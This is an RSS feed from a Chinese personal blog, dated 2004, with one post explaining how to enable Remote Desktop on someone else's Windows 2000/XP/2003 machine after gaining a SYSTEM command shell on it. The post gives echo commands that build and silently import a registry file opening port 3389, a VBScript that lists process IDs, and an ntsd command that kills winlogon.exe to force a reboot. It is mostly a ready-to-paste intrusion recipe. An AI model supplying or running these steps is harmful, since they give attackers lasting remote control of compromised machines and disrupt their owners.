<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[虫虫的blog  SINCE2004]]></title> 
<link>http://www.zhenghe.biz/index.php</link> 
<description><![CDATA[人生幻灯片  -   前半生(身)，不要怕；后半生(身)，不要悔！]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[虫虫的blog  SINCE2004]]></copyright>
<item>
<link>http://www.zhenghe.biz/read.php/.htm</link>
<title><![CDATA[绿色开启终端的简单方法]]></title> 
<author>网络毛毛虫 &lt;admin@yourname.com&gt;</author>
<category><![CDATA[技术文章]]></category>
<pubDate>Fri, 17 Dec 2004 14:47:50 +0000</pubDate> 
<guid>http://www.zhenghe.biz/read.php/.htm</guid> 
<description>
<![CDATA[ 
	<p>今天介绍的这种开终端的方法，绿色，环保，无污染~~<br />不须上传任何文件开启终端的方法适合win2k,xp,2003.<br />本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~<br />在无须传任何文件的情况下开启终端服务。<br /><br />一、win 2k下终端开启终端<br />首先用ECHO写一个3389.reg文件,然后导入到注册表，echo代码如下：<br /><br />echo Windows Registry Editor Version 5.00 &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] &gt;&gt;3389.reg<br />echo &quot;Enabled&quot;=&quot;0&quot; &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] &gt;&gt;3389.reg<br />echo &quot;ShutdownWithoutLogon&quot;=&quot;0&quot; &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] &gt;&gt;3389.reg<br />echo &quot;EnableAdminTSRemote&quot;=dword:00000001 &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] &gt;&gt;3389.reg<br />echo &quot;TSEnabled&quot;=dword:00000001 &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] &gt;&gt;3389.reg<br />echo &quot;Start&quot;=dword:00000002 &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] &gt;&gt;3389.reg<br />echo &quot;Start&quot;=dword:00000002 &gt;&gt;3389.reg<br />echo [HKEY_USERS\.DEFAULT\Keyboard"Layout\Toggle] &gt;&gt;3389.reg<br />echo &quot;Hotkey&quot;=&quot;1&quot; &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] &gt;&gt;3389.reg<br />echo &quot;PortNumber&quot;=dword:00000D3D &gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] &gt;&gt;3389.reg<br />echo &quot;PortNumber&quot;=dword:00000D3D &gt;&gt;3389.reg<br />把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。<br />(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)<br />因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效。<br />一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了！！<br />比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)<br />winlogon.exe被关闭后机器立刻强制重启了<br />命令执行格式为ntsd -c q -p PID<br />那如何知道winlogon.exe的PID进程号呢~<br />以下这个脚本可以列举当前所有进程的PID：<br /><br />wscript.echo &quot;PID   ProcessName&quot;<br />for each ps in getobject(&quot;winmgmts:\\.\root\cimv2:win32_process&quot;).instances_ <br />wscript.echo ps.handle&amp;vbtab&amp;ps.name<br />next<br />在CMDSHELL窗口下贴上如下ECHO代码就可以得到查看进程PID的脚本1.vbe：<br />echo wscript.echo &quot;PID   ProcessName&quot;&gt;&gt;1.vbe<br />echo for each ps in getobject(&quot;winmgmts:\\.\root\cimv2:win32_process&quot;).instances_ &gt;&gt;1.vbe<br />echo wscript.echo ps.handle^&amp;vbtab^&amp;ps.name&gt;&gt;1.vbe<br />echo next&gt;&gt;1.vbe<br /><br />生成1.vbe后请检查一下echo出来的脚本是否有错(才四行，对一下上面给出的就可以了)。<br />运行1.vbe得到如下运行结果：<br /><br />C:\WINNT\system32&gt;cscript 1.vbe<br />cscript 1.vbe<br />Microsoft (R) Windows 脚本宿主版本 5.1 for Windows<br />版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.<br /><br />PID   ProcessName<br />0     System Idle Process<br />8     System<br />152   smss.exe<br />180   csrss.exe<br />200   winlogon.exe<br />228   services.exe<br />240   lsass.exe<br />424   svchost.exe<br />472   spoolsv.exe<br />512   msdtc.exe<br />616   svchost.exe<br />628   KAVSvc.EXE<br />660   llssrv.exe<br />692   nvsvc32.exe<br />728   regsvc.exe<br />748   MSTask.exe<br />776   alter.exe<br />900   svchost.exe<br />916   WinMgmt.exe<br />1088   Dfssvc.exe<br />484   Explorer.EXE<br />1444   mdm.exe<br />1340   Server.exe<br />1224   ibguard.exe<br />1252   KAVSvcUI.EXE<br />1256   ibserver.exe<br />1336   internat.exe<br />1204   Uspds.exe<br />720   bar.exe<br />1288   dllhost.exe<br />1580   inetinfo.exe<br />1672   cmd.exe<br />1464   pppoe.exe<br />1704   regedit.exe<br />316   cscript.exe<br /><br />从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马<br /><br />上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~<br /><br /><br /><br />二、winxp和win2003终端开启<br /><br />开启的REG文件代码如下：<br />Windows Registry Editor Version 5.00<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]<br />&quot;fDenyTSConnections&quot;=dword:00000000<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]<br />&quot;PortNumber&quot;=dword:00000D3D<br />[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]<br />&quot;PortNumber&quot;=dword:00000D3D<br />用以下ECHO代码写一个REG文件：<br />echo Windows Registry Editor Version 5.00&gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]&gt;&gt;3389.reg<br />echo &quot;fDenyTSConnections&quot;=dword:00000000&gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]&gt;&gt;3389.reg<br />echo &quot;PortNumber&quot;=dword:00000d3d&gt;&gt;3389.reg<br />echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]&gt;&gt;3389.reg<br />echo &quot;PortNumber&quot;=dword:00000d3d&gt;&gt;3389.reg<br />regedit /s 3389.reg<br />del 3389.reg<br />这样xp和2003开启终端是不用重启的如果你想改端口只需把上面的两个PortNumber对应的D3D改成相应十进制数的十六进制形式就可以了！用计算器转换吧。XP下不论开终端还是改终端端口都不需重启，真是太妙了~~呵呵。如果要关闭终闭只需把&quot;fDenyTSConnections&quot;=dword:00000000<br /><br />改成&quot;fDenyTSConnections&quot;=dword:00000001<br /><br /></p>
]]>
</description>
</item><item>
<link>http://www.zhenghe.biz/read.php/.htm#blogcomment</link>
<title><![CDATA[[评论] 绿色开启终端的简单方法]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>http://www.zhenghe.biz/read.php/.htm#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>